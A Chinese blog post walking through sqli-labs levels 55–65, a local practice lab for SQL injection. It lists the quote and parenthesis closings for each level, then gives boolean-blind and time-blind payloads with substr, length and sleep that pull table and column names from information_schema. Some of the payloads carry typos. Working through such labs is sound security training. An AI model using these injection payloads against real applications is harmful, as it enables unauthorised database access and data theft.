sql lab (续)

最新推荐文章于 2024-10-04 00:46:18 发布
最新推荐文章于 2024-10-04 00:46:18 发布
阅读量30 收藏
点赞数
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74940843/article/details/133889608
版权
本文讲述了在less-55到less-65的SQL注入挑战中,逐步尝试不同的闭合方法,如substr函数和布尔/时间盲注,以探测security和users表的信息,以及列名。作者使用burp工具进行爆破并测试表名和列的具体内容。
摘要由CSDN通过智能技术生成

less-55

这题有14次试的机会

前面失误了几次,第13次才试出闭合是 )   无妨,次数到了刷新就好了

less-56

这题和上一题差不多,闭合的区别 ')

less-57

还是闭合的区别,"闭合

less-58

无回显,不能用显错注入方式,只有五次注入机会,用盲注也不太现实,所以试试报错注入

less-59

试了很多次,后来才发现原来没有闭合

less-60

闭合方式 "),其余也都一样

less-61

闭合方式 '))  套路都一样

less-62

闭合 ')

不能用上面的两种方式,试试盲注

长度为10

第一个字母为c

一个一个猜很麻烦,我们可以用burp爆破

利用substr函数依次往后面猜解

判断security库下的所有表

http://127.0.0.1/sql-labs/Less-62/?id=1') and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a'--+

判断users表下的字段

http://127.0.0.1/sql-labs/Less-62/?id=1') and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='a'--+

判断username字段下的值

less-63

和上一题一样,闭合的区别 '

less-64

也是闭合的区别, ))

less-65

")闭合,都一样

一样的套路:

")and length((select table name from information_schema.tables where table_ schema=database()))>1 --+ (布尔盲注得出表长度)
")and if(lenath((select table name from information_schema.tables where table_ schema=database()))>1,seep(5),1)--+(时间盲注得出表长度)
")and if(substr/(select table_name from information schema.tables where table_ schema=database()),1,1)=a,sleep(5),1)--+(判断表的具体字符串)
")and if(substr((select column name from information schema.columns where table_ schema=database() and table_name=上面查询出来的表),1,1)=a',sleep(5),1)--+ (判断列的具体字符串)

迪亚波罗#
关注
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1174
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
PostgreSQL之pgdump(
HighGO
02-05 309
使用unix管道压缩备份恢复 pg_dump testdb| gzip > testdbbak.sql.gz gunzip -c testdbbak.sql.gz | psql testdb1 备份后直接进行恢复,文件不落地 pg_dump testdb| psql testdb1 并行备份恢复 pg_dump -Fd -j4 -f /dbbak/db.dir testdb
SQLI-libs 9-14
qq_43871200的博客
03-20 260
前几天发了个1-8关的过关记录,想了下如果全写到一篇里太多了,第9关从这篇开始更新 mark一篇文章有关sql中的常用语法 第九关&第十关 有点意思,这题题目是时间盲注,因为无论是否输入正确的id,都会回显“you are in”。 百度了一下时间盲注,基本原理大概就是利用sleep()函数,感觉和布尔盲注的区别就是,布尔盲注是页面回显有正确和错误,然而时间盲注只有一种回显,但是可以将bo...
sqlserver2000升级到2005总结
赛志工作室
01-21 2163
<br />经历了很长时间的 sqlserver2000升级到2005 的测试,并开始了部分升级工作(10几台server)。现在一些总结共享下:  <br />升级前:(Pre-Update)  <br />1 升级版本检查  <br />升级前的版本 支持的升级路径  <br />SQL Server 2000 Enterprise Edition SP3 或更高版本1 SQL Server 2005 Enterprise Edition  <br />SQL Server 2000 Standard
PL/SQL中SELECT总结
weixin_33910434的博客
05-24 134
一、SELECT 语句的各个关键词的顺序及作用简解(这个我简略点写~) 1.SELECT 2.FROM 3.WHERE 4.GROUP BY ---对结果集进行分组,通常与聚合函数一起使用 5.HAVING 6.ORDER BY 举个例子如下: select item_name,count(item_name) from lab_item_dict whe...
sid更新 订sas软件_顶级统计软件sas9.4 64位sid 有效期至2017年6月底
weixin_39648539的博客
02-11 343
去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉去掉[_SID_]Version=9.4Revision=9.4Platform_long=Microsoft Windows Workstation for x64Platform_short=wx6Order=9BHX96License_prod=SASSetnumid=1200...
sqlserver2000升级到2005总结[转]
ynigeng的专栏
12-08 743
sqlserver2000升级到2005总结经历了很长时间的 sqlserver2000升级到2005 的测试,并开始了部分升级工作(10几台server)。现在一些总结共享下:升级前:(Pre-Update)                       1        升级版本检查                       升级前的版本        支持的升级路径          
SqliLab_Mysql_Injection详解_字符型注入(三)_布尔盲注/报错注入(6)
qq_41260930的博客
10-20 779
SqlLab_Mysql_Injection详解_字符型注入(四) SQL注入_布尔盲注 SQL注入_报错注入 原理 由于服务器在接受请求后,返回的页面存在报错提示的情况,可以使用一些特殊的函数在特殊的情况下,返回所想要获取的数据库信息; 常用的函数: UPDATEXML(XML_document,XPath_string,new_value)函数 第一个参数XML_document:XML_d...
简单英译汉SQL脚本
热门推荐
shencomd的专栏
10-19 19万+
create table t_dictionary(word varchar(200), trans varchar(1000)); insert into t_dictionary values('abandon','v.抛弃,放弃'); insert into t_dictionary values('abandonment','n.放弃'); insert into t_dictionary
ASP.NET及C#网上资料小收藏
qkqlqq0288的专栏
01-10 1970
<br />http://blog.csdn.net/guyehanxinlei/archive/2008/01/18/2051333.aspx<br />使用SqlBulkCopy类加载其他源数据到SQL表 <br />在数据回发时,维护ASP.NET Tree控件的位置 <br />vagerent的vs2005网站开发技巧 <br />ASP.NET2.0小技巧--内部控件权限的实现 <br />图片滚动代码。 <br />css——之三行三列等高布局 <br />Datagird TemplateC
大年三十整理的asp.net资料!(不得不收藏)
№悟◇
03-06 1万+
http://blog.csdn.net/mengyao/archive/2007/02/17/1511356.aspx使用SqlBulkCopy类加载其他源数据到SQL表 在数据回发时,维护ASP.NET Tree控件的位置 vagerent的vs2005网站开发技巧 ASP.NET2.0小技巧--内部控件权限的实现 图片滚动代码。
C#进度显示的简单实现
NS
05-25 1828
# 查询SQL Server数据库创建并填充Excel文件
Model的基础操作
weixin_47311812的博客
10-28 1378
1.创建表 https://www.cnblogs.com/xiaonq/p/7978409.html 1.1 Meta源信息 1.2 常用字段 from django.db import models class UserInfo(models.Model): username = models.CharField(max_length= 32 ) password = models.CharField(max_length= 32 ) cls = models.ForeinKey(CLS) c
前端的全栈混合之路Meteor篇:3.0新版本介绍
分享有趣的、贴近生活的CS知识
10-01 1033
Meteor全栈框架3.0版本终于稳定下来了,它的效果约等于webpack+vue+express+socket.io+mongodb+npm+uniapp,学一个搞定全套,值得学习了解下,最后找到适合于自己的技术栈。
Vue根实例、实例总结
最新发布
m0_54007573的博客
10-04 345
Vue根实例、实例总结
登录功能开发 P167重点
2303_81204446的博客
09-30 356
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。
Vue实战教程:如何用JS封装一个可复用的Loading组件
Jiaberrr的博客
09-28 576
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。
Web认识 -- 第一课
ZxVSaccount的博客
09-30 1163
这里是我们进入前端学习的开端,在本次更新之后我会陆上传html,css,javaScript等相关语言的教程,有感兴趣的小伙伴们点点关注,未来我们一起学习!IE、火狐和谷歌是目前互联网上的三大浏览器,其他常用的浏览器还有苹果的Safari浏览器和欧朋浏览器等。对于一般的网站,只要兼容IE浏览器、火狐浏览器和谷歌浏览器,就能满足绝大多数用户的需求。本节主要简单介绍了一下关于HTML、CSS、JavaScript的一些基本概念,有感兴趣的朋友,点点关注我们一起学习,博主持更新中!
tomcat sql-lab
07-27
对于Tomcat和SQL-Lab的问题,我可以为您提供一些基本信息。 Tomcat是一个开源的Java Servlet容器,用于在服务器上运行Java Web应用程序。它是Apache软件基金会的一个项目,提供了一个可靠和高性能的Web服务器环境。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

迪亚波罗#

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值